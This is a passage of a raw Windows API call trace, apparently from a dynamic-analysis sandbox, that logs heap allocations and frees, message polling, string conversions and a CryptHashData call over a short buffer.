(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.561] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0265.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f48 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0265.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0265.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0265.563] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0265.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fc8 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0265.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0265.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0265.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fe8 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0265.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0265.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.565] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0265.565] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.566] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0265.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51e68, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0265.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.566] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0265.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0265.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.567] CryptHashData (hHash=0xa87550, pbData=0x2e54f48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.567] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.567] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0265.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e68 [0265.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0265.567] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0265.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0265.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0265.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0265.569] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0265.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0265.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ce8 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.569] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0265.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0265.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0265.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0265.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0265.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 